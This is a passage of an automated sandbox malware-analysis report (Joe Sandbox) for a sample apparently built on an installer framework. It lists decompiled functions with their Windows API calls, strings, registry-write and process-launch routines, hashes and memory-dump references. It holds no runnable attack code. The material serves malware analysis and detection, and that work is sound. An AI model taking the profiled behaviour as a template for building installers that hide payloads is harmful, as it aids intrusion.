                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                          Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                          Function 004023F0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                          • PIy, xrefs: 00402473
                                                                                                                                                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$PIy$`G
                                                                                                                                                                                                                                                                                                          • API String ID: 1033533793-3114273740
                                                                                                                                                                                                                                                                                                          • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                          • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                          Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                          Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                                                          • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                                                          • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                                                          Memory Dump Source
